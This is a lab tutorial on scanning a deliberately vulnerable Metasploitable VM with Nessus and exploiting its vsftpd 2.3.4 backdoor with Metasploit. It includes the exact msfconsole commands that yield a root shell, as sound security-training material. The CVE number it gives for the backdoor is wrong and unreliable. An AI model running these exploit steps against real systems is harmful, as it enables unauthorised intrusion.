Nessus Scan & Metasploitable Attack

TL;DR

This guide shows you how to use Nessus to identify vulnerabilities on a deliberately vulnerable virtual machine (Metasploitable) and then exploit one of those vulnerabilities using Metasploit. This is for learning purposes only – never scan or attack systems without explicit permission.

Prerequisites

• VirtualBox installed
• Metasploitable virtual machine downloaded and running (download from Rapid7)
• Nessus Essentials installed and configured (download from Tenable – requires a free account)

Step 1: Discover Metasploitable

First, we need to tell Nessus about the target machine.

1. Open Nessus and click on ‘New Scan’.
2. Choose ‘Basic Network Scan’ as your scan type.
3. Give the scan a name (e.g., “Metasploitable Scan”) and description.
4. Enter the IP address of your Metasploitable VM in the ‘Target’ field. You can find this using ifconfig within the Metasploitable terminal:

   ifconfig eth0 | grep 'inet addr:'

   . The IP address will be after ‘inet addr:’.

5. Click ‘Save’.

Step 2: Run the Scan

Now, launch the scan to find potential weaknesses.

1. Select your newly created scan from the Nessus dashboard.
2. Click the green ‘Launch’ button.
3. Wait for the scan to complete. This can take 30 minutes or more depending on your hardware and network speed.

Step 3: Analyse Scan Results

Nessus will present a report of vulnerabilities found.

1. Once the scan is finished, review the ‘Overview’ tab for a summary of critical, high, medium and low severity findings.
2. Click on individual vulnerabilities to see details, including descriptions, potential impact, and remediation steps.
3. For this example, we’ll exploit the vsftpd 2.3.4 Backdoor Command Execution vulnerability (CVE-2011-5720). This is usually listed as a high severity finding.

Step 4: Exploit with Metasploit

We’ll use the Metasploit framework to exploit the vsftpd vulnerability.

1. Open a terminal and start Metasploit using msfconsole.
2. Search for the appropriate module:

   search vsftpd 2.3.4

   . This should return the ‘exploit/unix/ftp/vsftpd_234_backdoor’ module.

3. Use the module:

   use exploit/unix/ftp/vsftpd_234_backdoor

   .

4. Set the target IP address:

   set RHOSTS [Metasploitable IP Address]

   . Replace ‘[Metasploitable IP Address]’ with the actual IP.

5. Run the exploit:

   run

   . This will attempt to gain a shell on Metasploitable.

6. If successful, you’ll get a root shell! You can verify this by running whoami which should output ‘root’.

Step 5: Clean Up (Important)

After the exploit, it’s vital to clean up.

• Exit Metasploit using exit.
• Shut down or reset your Metasploitable VM. This prevents further unintended access.